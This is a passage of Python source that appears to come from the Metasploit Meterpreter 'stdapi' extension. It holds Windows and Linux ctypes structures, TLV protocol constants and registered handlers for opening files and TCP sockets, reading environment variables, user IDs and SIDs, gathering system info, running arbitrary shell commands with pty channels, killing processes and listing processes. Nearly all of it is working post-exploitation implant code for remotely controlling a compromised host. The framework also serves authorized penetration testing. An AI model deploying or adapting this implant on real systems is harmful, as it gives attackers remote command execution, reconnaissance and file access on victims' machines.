("dwSpeed", ctypes.c_uint32),
("dwPhysAddrLen", ctypes.c_uint32),
("bPhysAddr", (ctypes.c_uint8 * 8)),
("dwAdminStatus", ctypes.c_uint32),
("dwOperStaus", ctypes.c_uint32),
("dwLastChange", ctypes.c_uint32),
("dwInOctets", ctypes.c_uint32),
("dwInUcastPkts", ctypes.c_uint32),
("dwInNUcastPkts", ctypes.c_uint32),
("dwInDiscards", ctypes.c_uint32),
("dwInErrors", ctypes.c_uint32),
("dwInUnknownProtos", ctypes.c_uint32),
("dwOutOctets", ctypes.c_uint32),
("dwOutUcastPkts", ctypes.c_uint32),
("dwOutNUcastPkts", ctypes.c_uint32),
("dwOutDiscards", ctypes.c_uint32),
("dwOutErrors", ctypes.c_uint32),
("dwOutQLen", ctypes.c_uint32),
("dwDescrLen", ctypes.c_uint32),
("bDescr", (ctypes.c_char * 256))]
class MIB_IPADDRROW(ctypes.Structure):
_fields_ = [("dwAddr", ctypes.c_uint32),
("dwIndex", ctypes.c_uint32),
("dwMask", ctypes.c_uint32),
("dwBCastAddr", ctypes.c_uint32),
("dwReasmSize", ctypes.c_uint32),
("unused1", ctypes.c_uint16),
("wType", ctypes.c_uint16)]
class PROCESSENTRY32(ctypes.Structure):
_fields_ = [("dwSize", ctypes.c_uint32),
("cntUsage", ctypes.c_uint32),
("th32ProcessID", ctypes.c_uint32),
("th32DefaultHeapID", ctypes.c_void_p),
("th32ModuleID", ctypes.c_uint32),
("cntThreads", ctypes.c_uint32),
("th32ParentProcessID", ctypes.c_uint32),
("thPriClassBase", ctypes.c_int32),
("dwFlags", ctypes.c_uint32),
("szExeFile", (ctypes.c_char * 260))]
class SID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [("Sid", ctypes.c_void_p),
("Attributes", ctypes.c_uint32)]
class SYSTEM_INFO(ctypes.Structure):
_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
("wReserved", ctypes.c_uint16),
("dwPageSize", ctypes.c_uint32),
("lpMinimumApplicationAddress", ctypes.c_void_p),
("lpMaximumApplicationAddress", ctypes.c_void_p),
("dwActiveProcessorMask", ctypes.c_uint32),
("dwNumberOfProcessors", ctypes.c_uint32),
("dwProcessorType", ctypes.c_uint32),
("dwAllocationGranularity", ctypes.c_uint32),
("wProcessorLevel", ctypes.c_uint16),
("wProcessorRevision", ctypes.c_uint16)]
class TOKEN_USER(ctypes.Structure):
_fields_ = [("User", SID_AND_ATTRIBUTES)]
#
# Linux Structures
#
class IFADDRMSG(ctypes.Structure):
_fields_ = [("family", ctypes.c_uint8),
("prefixlen", ctypes.c_uint8),
("flags", ctypes.c_uint8),
("scope", ctypes.c_uint8),
("index", ctypes.c_int32)]
class IFINFOMSG(ctypes.Structure):
_fields_ = [("family", ctypes.c_uint8),
("pad", ctypes.c_int8),
("type", ctypes.c_uint16),
("index", ctypes.c_int32),
("flags", ctypes.c_uint32),
("chagen", ctypes.c_uint32)]
class NLMSGHDR(ctypes.Structure):
_fields_ = [("len", ctypes.c_uint32),
("type", ctypes.c_uint16),
("flags", ctypes.c_uint16),
("seq", ctypes.c_uint32),
("pid", ctypes.c_uint32)]
class RTATTR(ctypes.Structure):
_fields_ = [("len", ctypes.c_uint16),
("type", ctypes.c_uint16)]
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
##
# Fs
##
TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
TLV_TYPE_FILE_HASH = TLV_META_TYPE_RAW | 1206
TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
##
# Net
##
TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
TLV_TYPE_INTERFACE_MTU = TLV_META_TYPE_UINT | 1402
TLV_TYPE_INTERFACE_FLAGS = TLV_META_TYPE_STRING | 1403
TLV_TYPE_INTERFACE_INDEX = TLV_META_TYPE_UINT | 1404
TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
TLV_TYPE_IP_PREFIX = TLV_META_TYPE_UINT | 1424
TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
TLV_TYPE_IP6_SCOPE = TLV_META_TYPE_RAW | 1434
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
##
# Socket
##
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
##
TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
##
# Config
##
TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
TLV_TYPE_SID = TLV_META_TYPE_STRING | 1045
##
# Environment
##
TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_QWORD | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
##
# Ui
##
TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
##
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
##
# Power
##
TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
##
# Sys
##
PROCESS_EXECUTE_FLAG_HIDDEN = (1 << 0)
PROCESS_EXECUTE_FLAG_CHANNELIZED = (1 << 1)
PROCESS_EXECUTE_FLAG_SUSPENDED = (1 << 2)
PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN = (1 << 3)
PROCESS_ARCH_UNKNOWN = 0
PROCESS_ARCH_X86 = 1
PROCESS_ARCH_X64 = 2
PROCESS_ARCH_IA64 = 3
##
# Errors
##
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
# Special return value to match up with Windows error codes for network
# errors.
ERROR_CONNECTION_ERROR = 10000
# Windows Constants
GAA_FLAG_SKIP_ANYCAST = 0x0002
GAA_FLAG_SKIP_MULTICAST = 0x0004
GAA_FLAG_INCLUDE_PREFIX = 0x0010
GAA_FLAG_SKIP_DNS_SERVER = 0x0080
PROCESS_TERMINATE = 0x0001
PROCESS_VM_READ = 0x0010
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
WIN_AF_INET = 2
WIN_AF_INET6 = 23
# Linux Constants
RTM_GETLINK = 18
RTM_GETADDR = 22
RTM_GETROUTE = 26
IFLA_ADDRESS = 1
IFLA_BROADCAST = 2
IFLA_IFNAME = 3
IFLA_MTU = 4
IFA_ADDRESS = 1
IFA_LABEL = 3
meterpreter.register_extension('stdapi')
def calculate_32bit_netmask(bits):
if bits == 32:
return 0xffffffff
return ((0xffffffff << (32-(bits%32))) & 0xffffffff)
def cstruct_unpack(structure, raw_data):
if not isinstance(structure, ctypes.Structure):
structure = structure()
ctypes.memmove(ctypes.byref(structure), raw_data, ctypes.sizeof(structure))
return structure
def get_stat_buffer(path):
si = os.stat(path)
rdev = 0
if hasattr(si, 'st_rdev'):
rdev = si.st_rdev
blksize = 0
if hasattr(si, 'st_blksize'):
blksize = si.st_blksize
blocks = 0
if hasattr(si, 'st_blocks'):
blocks = si.st_blocks
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
st_buf += struct.pack('<HHHI', si.st_uid & 0xffff, si.st_gid & 0xffff, 0, rdev)
st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def get_token_user(handle):
TOKEN_QUERY = 0x0008
TokenUser = 1
advapi32 = ctypes.windll.advapi32
advapi32.OpenProcessToken.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_void_p)]
token_handle = ctypes.c_void_p()
if not advapi32.OpenProcessToken(handle, TOKEN_QUERY, ctypes.byref(token_handle)):
return None
token_user_buffer = (ctypes.c_byte * 4096)()
dw_returned = ctypes.c_uint32()
result = advapi32.GetTokenInformation(token_handle, TokenUser, ctypes.byref(token_user_buffer), ctypes.sizeof(token_user_buffer), ctypes.byref(dw_returned))
ctypes.windll.kernel32.CloseHandle(token_handle)
if not result:
return None
return cstruct_unpack(TOKEN_USER, token_user_buffer)
def get_username_from_token(token_user):
user = (ctypes.c_char * 512)()
domain = (ctypes.c_char * 512)()
user_len = ctypes.c_uint32()
user_len.value = ctypes.sizeof(user)
domain_len = ctypes.c_uint32()
domain_len.value = ctypes.sizeof(domain)
use = ctypes.c_ulong()
use.value = 0
if not ctypes.windll.advapi32.LookupAccountSidA(None, token_user.User.Sid, user, ctypes.byref(user_len), domain, ctypes.byref(domain_len), ctypes.byref(use)):
return None
return str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(user))
def netlink_request(req_type):
import select
# See RFC 3549
NLM_F_REQUEST = 0x0001
NLM_F_ROOT = 0x0100
NLMSG_ERROR = 0x0002
NLMSG_DONE = 0x0003
sock = socket.socket(socket.AF_NETLINK, socket.SOCK_RAW, socket.NETLINK_ROUTE)
sock.bind((os.getpid(), 0))
seq = int(time.time())
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
sock.send(nlmsg)
responses = []
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
return responses
raw_response_data = sock.recv(0xfffff)
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
while response.type != NLMSG_DONE:
if response.type == NLMSG_ERROR:
break
response_data = raw_response_data[:(response.len - 16)]
responses.append(response_data)
raw_response_data = raw_response_data[len(response_data):]
if not len(raw_response_data):
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
break
raw_response_data = sock.recv(0xfffff)
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
sock.close()
return responses
def resolve_host(hostname, family):
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
family = address_info[0]
address = address_info[4][0]
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
def windll_GetNativeSystemInfo():
if not has_windll:
return None
sysinfo = SYSTEM_INFO()
ctypes.windll.kernel32.GetNativeSystemInfo(ctypes.byref(sysinfo))
return {0:PROCESS_ARCH_X86, 6:PROCESS_ARCH_IA64, 9:PROCESS_ARCH_X64}.get(sysinfo.wProcessorArchitecture, PROCESS_ARCH_UNKNOWN)
def windll_GetVersion():
if not has_windll:
return None
dwVersion = ctypes.windll.kernel32.GetVersion()
dwMajorVersion = (dwVersion & 0x000000ff)
dwMinorVersion = ((dwVersion & 0x0000ff00) >> 8)
dwBuild = ((dwVersion & 0xffff0000) >> 16)
return type('Version', (object,), dict(dwMajorVersion = dwMajorVersion, dwMinorVersion = dwMinorVersion, dwBuild = dwBuild))
@meterpreter.register_function
def channel_open_stdapi_fs_file(request, response):
fpath = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
if fmode:
fmode = fmode['value']
fmode = fmode.replace('bb', 'b')
else:
fmode = 'rb'
file_h = open(unicode(fpath), fmode)
channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def channel_open_stdapi_net_tcp_client(request, response):
host = packet_get_tlv(request, TLV_TYPE_PEER_HOST)['value']
port = packet_get_tlv(request, TLV_TYPE_PEER_PORT)['value']
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST)
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)
retries = packet_get_tlv(request, TLV_TYPE_CONNECT_RETRIES).get('value', 1)
connected = False
for i in range(retries + 1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
if local_host.get('value') and local_port.get('value'):
sock.bind((local_host['value'], local_port['value']))
try:
sock.connect((host, port))
connected = True
break
except:
pass
if not connected:
return ERROR_CONNECTION_ERROR, response
channel_id = meterpreter.add_channel(MeterpreterSocketClient(sock))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def channel_open_stdapi_net_tcp_server(request, response):
local_host = packet_get_tlv(request, TLV_TYPE_LOCAL_HOST).get('value', '0.0.0.0')
local_port = packet_get_tlv(request, TLV_TYPE_LOCAL_PORT)['value']
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_sock.bind((local_host, local_port))
server_sock.listen(socket.SOMAXCONN)
channel_id = meterpreter.add_channel(MeterpreterSocketServer(server_sock))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getenv(request, response):
for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
pgroup = bytes()
env_var = env_var['value']
env_var = env_var.replace('%', '')
env_var = env_var.replace('$', '')
env_val = os.environ.get(env_var)
if env_val:
pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
return ERROR_SUCCESS, response
@meterpreter.register_function_windll
def stdapi_sys_config_getsid(request, response):
token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
if not token:
return error_result_windows(), response
sid_str = ctypes.c_char_p()
if not ctypes.windll.advapi32.ConvertSidToStringSidA(token.User.Sid, ctypes.byref(sid_str)):
return error_result_windows(), response
sid_str = str(ctypes.string_at(sid_str))
response += tlv_pack(TLV_TYPE_SID, sid_str)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_getuid(request, response):
if has_pwd:
username = pwd.getpwuid(os.getuid()).pw_name
elif has_windll:
token = get_token_user(ctypes.windll.kernel32.GetCurrentProcess())
if not token:
return error_result_windows(), response
username = get_username_from_token(token)
if not username:
return error_result_windows(), response
else:
username = getpass.getuser()
response += tlv_pack(TLV_TYPE_USER_NAME, username)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_config_sysinfo(request, response):
uname_info = platform.uname()
response += tlv_pack(TLV_TYPE_COMPUTER_NAME, uname_info[1])
response += tlv_pack(TLV_TYPE_OS_NAME, uname_info[0] + ' ' + uname_info[2] + ' ' + uname_info[3])
arch = uname_info[4]
if has_windll:
arch = windll_GetNativeSystemInfo()
if arch == PROCESS_ARCH_IA64:
arch = 'IA64'
elif arch == PROCESS_ARCH_X64:
arch = 'x86_64'
elif arch == PROCESS_ARCH_X86:
arch = 'x86'
else:
arch = uname_info[4]
response += tlv_pack(TLV_TYPE_ARCHITECTURE, arch)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_close(request, response):
proc_h_id = packet_get_tlv(request, TLV_TYPE_HANDLE)
if not proc_h_id:
return ERROR_SUCCESS, response
proc_h_id = proc_h_id['value']
del meterpreter.processes[proc_h_id]
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_execute(request, response):
cmd = packet_get_tlv(request, TLV_TYPE_PROCESS_PATH)['value']
raw_args = packet_get_tlv(request, TLV_TYPE_PROCESS_ARGUMENTS)
if raw_args:
raw_args = raw_args['value']
else:
raw_args = ""
flags = packet_get_tlv(request, TLV_TYPE_PROCESS_FLAGS)['value']
if len(cmd) == 0:
return ERROR_FAILURE, response
if os.path.isfile('/bin/sh'):
args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
else:
args = [cmd]
args.extend(shlex.split(raw_args))
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
if has_pty:
master, slave = pty.openpty()
if has_termios:
settings = termios.tcgetattr(master)
settings[3] = settings[3] & ~termios.ECHO
termios.tcsetattr(master, termios.TCSADRAIN, settings)
proc_h = STDProcess(args, stdin=slave, stdout=slave, stderr=slave, bufsize=0)
proc_h.stdin = os.fdopen(master, 'wb')
proc_h.stdout = os.fdopen(master, 'rb')
proc_h.stderr = open(os.devnull, 'rb')
else:
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc_h.echo_protection = True
proc_h.start()
else:
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc_h_id = meterpreter.add_process(proc_h)
response += tlv_pack(TLV_TYPE_PID, proc_h.pid)
response += tlv_pack(TLV_TYPE_PROCESS_HANDLE, proc_h_id)
if (flags & PROCESS_EXECUTE_FLAG_CHANNELIZED):
channel_id = meterpreter.add_channel(proc_h)
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_getpid(request, response):
response += tlv_pack(TLV_TYPE_PID, os.getpid())
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_sys_process_kill(request, response):
for pid in packet_enum_tlvs(request, TLV_TYPE_PID):
pid = pid['value']
if has_windll:
k32 = ctypes.windll.kernel32
proc_h = k32.OpenProcess(PROCESS_TERMINATE, False, pid)
if not proc_h:
return error_result_windows(), response
if not k32.TerminateProcess(proc_h, 0):
return error_result_windows(), response
elif hasattr(os, 'kill'):
os.kill(pid, 9)
else:
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def stdapi_sys_process_get_processes_via_proc(request, response):
for pid in os.listdir('/proc'):
pgroup = bytes()
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
continue
cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
status = {}
for k, v in filter(lambda x: len(x) == 2, status_data):
status[k[:-1]] = v.strip()
ppid = status.get('PPid')
uid = status.get('Uid').split('\t', 1)[0]
if has_pwd:
uid = pwd.getpwuid(int(uid)).pw_name
if cmd:
pname = os.path.basename(cmd.split(' ', 1)[0])
ppath = cmd
else:
pname = '[' + status['Name'] + ']'
ppath = ''
pgroup += tlv_pack(TLV_TYPE_PID, int(pid))
if ppid:
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(ppid))
pgroup += tlv_pack(TLV_TYPE_USER_NAME, uid)
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, pname)
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ppath)
response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
return ERROR_SUCCESS, response
def stdapi_sys_process_get_processes_via_ps(request, response):
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps_output = str(proc_h.stdout.read())
ps_output = ps_output.split('\n')
ps_output.pop(0)
for process in ps_output:
process = process.split()
if len(process) < 4:
break
pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
pgroup += tlv_pack(TLV_TYPE_PROCESS_NAME, os.path.basename(process[3]))
pgroup += tlv_pack(TLV_TYPE_PROCESS_PATH, ' '.join(process[3:]))
response += tlv_pack(TLV_TYPE_PROCESS_GROUP, pgroup)
return ERROR_SUCCESS, response
def stdapi_sys_process_get_processes_via_windll(request, response):
TH32CS_SNAPPROCESS = 2
TOKEN_QUERY = 0x0008
TokenUser = 1
k32 = ctypes.windll.kernel32
pe32 = PROCESSENTRY32()
pe32.dwSize = ctypes.sizeof(PROCESSENTRY32)
proc_snap = k32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
result = k32.Process32First(proc_snap, ctypes.byref(pe32))
if not result:
return error_result_windows(), response
while result:
proc_h = k32.OpenProcess((PROCESS_QUERY_INFORMATION | PROCESS_VM_READ), False, pe32.th32ProcessID)
if not proc_h:
proc_h = k32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pe32.th32ProcessID)
exe_path = (ctypes.c_char * 1024)()
success = False
if hasattr(ctypes.windll.psapi, 'GetModuleFileNameExA'):
success = ctypes.windll.psapi.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
elif hasattr(k32, 'GetModuleFileNameExA'):
success = k32.GetModuleFileNameExA(proc_h, 0, exe_path, ctypes.sizeof(exe_path))
if not success and hasattr(k32, 'QueryFullProcessImageNameA'):
dw_sz = ctypes.c_uint32()
dw_sz.value = ctypes.sizeof(exe_path)
success = k32.QueryFullProcessImageNameA(proc_h, 0, exe_path, ctypes.byref(dw_sz))
if not success and hasattr(ctypes.windll.psapi, 'GetProcessImageFileNameA'):
success = ctypes.windll.psapi.GetProcessImageFileNameA(proc_h, exe_path, ctypes.sizeof(exe_path))
if success:
exe_path = ctypes.string_at(exe_path)
else:
